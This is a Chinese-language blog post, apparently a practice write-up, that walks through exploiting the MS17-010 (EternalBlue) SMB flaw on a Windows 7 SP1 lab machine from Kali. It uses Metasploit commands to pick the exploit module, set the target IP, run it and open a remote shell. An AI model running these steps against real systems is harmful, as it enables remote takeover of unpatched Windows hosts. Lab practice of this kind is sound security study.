当前位置:网站首页>metasploit渗透ms7_010练习
metasploit渗透ms7_010练习
2022-07-28 05:29:00 【angleoldhen】
环境:kali2022.2vm+win7 sp1
命令:msfconsole 启动metasploit框架(也可以在菜单Exploitation Tools里点击metasploit framework)
先在框架里查找对应漏洞可用工具:search ms17_010

选用一个工具,可参考RANK列里的描述,大致有excellent、great、good、average、normal、manual等几个级别,表明该工具的攻击效果,excellent级的工具最优
use exploit/windows/smb/ms17_010_eternalblue

查看载荷参数 show options


required列里yes的都是必须设置的,有些已经填写,没填写的需要手动填写
如:set RHOSTS 192.168.107.129 //设置靶机的IP

本机IP和端口,靶机端口均已设置,无须再手打
执行命令 run

绿色【+】的行表示已执行成功
执行命令 shell

从图中可见已经成功登陆到靶机系统
边栏推荐
猜你喜欢

YUM仓库的搭建

How to describe a bug and the definition and life cycle of bug level

Applet creation component

Monotonic queue, Luogu p1886 sliding window

Technology sharing | send requests using postman

MOOC Weng Kai C language week 8: pointer and string: 1. Pointer 2. Character type 3. String 4. String calculation

Wechat applet custom compilation mode

SSH service configuration

Detailed explanation of LNMP construction process

Shell script - sort, uniq, TR, array sort, cut, Eval command configuration
随机推荐
bond模式配置
Esxi community network card driver
Iptables firewall
Bond mode configuration
Blue Bridge Cup square filling number
shell脚本——编程条件语句(条件测试、if语句、case分支语句、echo用法、for循环、while循环)
[learning notes] knowledge management
MOOC翁恺C语言 第六周:数组与函数:1.数组2.函数的定义与使用3.函数的参数和变量4.二维数组
Technology sharing | detailed explanation of actual combat interface test request methods get, post
多进程(多核运算)Multiprocessing
Icc2 analysis timing artifact analyze_ design_ violations
RAID disk array
三层交换和VRRP
Technology sharing | sending requests using curl
DNS domain name resolution service
Results fill in the blanks carelessly (violent solution)
Canvas drawing 1
Archery database audit platform deployment
DOM - Events
NFS shared storage service